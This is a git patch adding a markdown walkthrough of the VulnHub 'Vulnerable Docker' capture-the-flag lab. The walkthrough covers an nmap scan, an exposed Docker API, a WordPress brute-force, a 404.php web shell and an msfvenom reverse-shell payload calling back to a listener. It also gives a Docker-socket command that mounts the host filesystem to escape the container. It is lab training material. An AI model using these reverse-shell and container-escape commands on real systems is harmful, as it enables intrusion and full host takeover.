From 44155ca6c0191d13cf24fd0856a07a7a6f798a25 Mon Sep 17 00:00:00 2001
From: ARZ <60057481+AbdullahRizwan101@users.noreply.github.com>
Date: Fri, 26 Mar 2021 15:21:40 +0500
Subject: [PATCH] Add files via upload
---
VulnHub/Vulnerable_docker.md | 164 +++++++++++++++++++++++++++++++++++
1 file changed, 164 insertions(+)
create mode 100644 VulnHub/Vulnerable_docker.md
diff --git a/VulnHub/Vulnerable_docker.md b/VulnHub/Vulnerable_docker.md
new file mode 100644
index 0000000..7641f63
--- /dev/null
+++ b/VulnHub/Vulnerable_docker.md
@@ -0,0 +1,164 @@
+# Vulnhub- Vulnerable Docker (Easy)
+
+
+
+We don't need to use `netdiscover` or any other tool to get IP of the box since it already shows at login banner
+
+## NMAP
+
+```
+nmap -p- -sC -sV
+
+PORT STATE SERVICE VERSION
+22/tcp open ssh OpenSSH 6.6p1 Ubuntu 2ubuntu1 (Ubuntu Linux; protocol 2.0)
+| ssh-hostkey:
+| 1024 45:13:08:81:70:6d:46:c3:50:ed:3c:ab:ae:d6:e1:85 (DSA)
+| 2048 4c:e7:2b:01:52:16:1d:5c:6b:09:9d:3d:4b:bb:79:90 (RSA)
+| 256 cc:2f:62:71:4c:ea:6c:a6:d8:a7:4f:eb:82:2a:22:ba (ECDSA)
+|_ 256 73:bf:b4:d6:ad:51:e3:99:26:29:b7:42:e3:ff:c3:81 (ED25519)
+2375/tcp open docker Docker 17.06.0-ce
+| docker-version:
+| BuildTime: 2017-06-23T21:17:13.228983331+00:00
+| Arch: amd64
+| KernelVersion: 3.13.0-128-generic
+| ApiVersion: 1.30
+| MinAPIVersion: 1.12
+| GitCommit: 02c1d87
+| Version: 17.06.0-ce
+| GoVersion: go1.8.3
+|_ Os: linux
+| fingerprint-strings:
+| FourOhFourRequest:
+| HTTP/1.0 404 Not Found
+| Content-Type: application/json
+| Date: Wed, 24 Mar 2021 18:06:13 GMT
+| Content-Length: 29
+| {"message":"page not found"}
+| GenericLines, Help, Kerberos, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
+| HTTP/1.1 400 Bad Request
+| Content-Type: text/plain; charset=utf-8
+| Connection: close
+| Request
+| GetRequest:
+| HTTP/1.0 404 Not Found
+| Content-Type: application/json
+| Date: Wed, 24 Mar 2021 18:05:48 GMT
+| Content-Length: 29
+| {"message":"page not found"}
+| HTTPOptions:
+| HTTP/1.0 200 OK
+| Api-Version: 1.30
+| Docker-Experimental: false
+| Ostype: linux
+| Server: Docker/17.06.0-ce (linux)
+| Date: Wed, 24 Mar 2021 18:05:48 GMT
+| Content-Length: 0
+| Content-Type: text/plain; charset=utf-8
+| docker:
+| HTTP/1.1 400 Bad Request: missing required Host header
+| Content-Type: text/plain; charset=utf-8
+| Connection: close
+|_ Request: missing required Host header
+8000/tcp open http Apache httpd 2.4.10 ((Debian))
+|_http-generator: WordPress 4.8.1
+| http-robots.txt: 1 disallowed entry
+|_/wp-admin/
+|_http-server-header: Apache/2.4.10 (Debian)
+|_http-title: NotSoEasy Docker – Just another WordPress site
+MAC Address: 08:00:27:D7:94:9E (Oracle VirtualBox virtual NIC)
+```
+
+
+## PORT 2375 (Docker)
+
+Since docker api is exposed we can try connecting to port by listing images
+
+
+
+We can also see which containers are currently running
+
+
+
+
+wordpress:WordPressISBest
+
+## PORT 8000
+
+
+
+
+
+
+Running `wpscan`
+
+
+
+
+
+We can now bruteforce the password for `bob`
+
+
+
+
+
+Using these credentials we can login to wordpress site
+
+
+
+To get a shelll we can edit `404.php` template of the currently active theme
+
+
+
+
+
+Alternatively you can get a meterpreter shell my generating a payload with `msfvenom`
+
+
+
+
+
+
+
+Now in order to do pivoting web shell are not stable (in both windows and linux ) so after we got the intial foothold we may need to stablize our shell in meterpreter we have to sepefically generate a linux payload
+
+`msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST=192.168.1.8 LPORT=4444 -f elf > shell.elf`
+
+
+
+
+
+### Unstable shell
+
+
+
+### New meterpreter shell
+
+
+
+
+
+Now we have added the route to subnet `172.18.0.0` for docker container , we can now scan for open ports on the container and since there are more as we saw from enumerating docker port
+
+
+
+Start `socks4a proxy`
+
+
+
+Use `foxyproxy` to switch to socks4a proxy and since port 8022 is open we can see what's there
+
+
+
+
+
+
+
+This container has `docker.sock` which allows to communicate with docker meaning creating , adding ,deleting container so there's a trick to mount the host system on the docker container by uploading `docker` and run command `docker run -it -v /:/host/ chroot /host/ bash ` binary instead we have docker port and we can access those container so we can remotely do this
+
+`docker -H tcp://192.168.1.7:2375 run --rm -it -v /:/host wordpress chroot /host bash`
+
+
+
+And we can read the the flag which means we are on a host machine
+
+
\ No newline at end of file